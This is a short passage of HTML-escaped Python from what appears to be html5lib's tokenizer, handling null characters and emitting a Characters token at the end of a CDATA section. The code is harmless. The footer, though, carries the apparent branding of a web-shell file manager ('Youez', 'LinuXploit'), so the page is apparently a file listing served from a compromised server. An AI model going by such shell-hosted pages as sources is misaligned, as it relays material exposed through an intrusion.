        data = &quot;&quot;.join(data)  # pylint:disable=redefined-variable-type
        # Deal with null here rather than in the parser
        # One invalid-codepoint ParseError is queued per U+0000 found, then
        # all of them are replaced with U+FFFD in a single pass.
        nullCount = data.count(&quot;\u0000&quot;)
        if nullCount &gt; 0:
            for _ in range(nullCount):
                self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                        &quot;data&quot;: &quot;invalid-codepoint&quot;})
            data = data.replace(&quot;\u0000&quot;, &quot;\uFFFD&quot;)
        # An empty CDATA section produces no Characters token.
        if data:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: data})
        self.state = self.dataState
        return True
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>